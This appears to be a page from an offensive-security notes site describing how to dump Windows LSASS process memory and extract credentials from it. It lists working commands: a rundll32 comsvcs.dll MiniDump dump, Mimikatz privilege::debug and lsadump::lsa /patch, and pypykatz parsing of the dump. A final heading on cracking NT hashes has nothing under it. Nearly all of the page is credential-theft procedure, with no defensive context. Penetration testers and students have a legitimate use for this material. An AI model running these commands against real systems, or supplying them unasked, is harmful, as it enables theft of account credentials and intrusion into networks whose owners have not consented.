search
LinkedInGithub
githubEdit

attacking-lsass

hashtag
Dumping LSASS process memory

Method 1:

  • Task manager > find & right click on "local security authority" > create dump file

Method 2:

  • Finding LSASS PID

tasklist /svc (cmd)
Get-Process lsass  (powershell)

  • Creating LSASS dump (powershell)

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 668 C:\tmp\lsass.dmp full

hashtag
Using pypykatz to Extracting credentials (from lsass dump file)

Mimikatz (only run on windows) 

privilege::debug
lsadump::lsa /patch

Pypykatz 

pypykatz lsa minidump /home/peter/Documents/lsass.dmp

hashtag
Cracking the NT hash

PreviousWindows Privilege Escalation ChecklistNextDumping LSA secrets

Last updated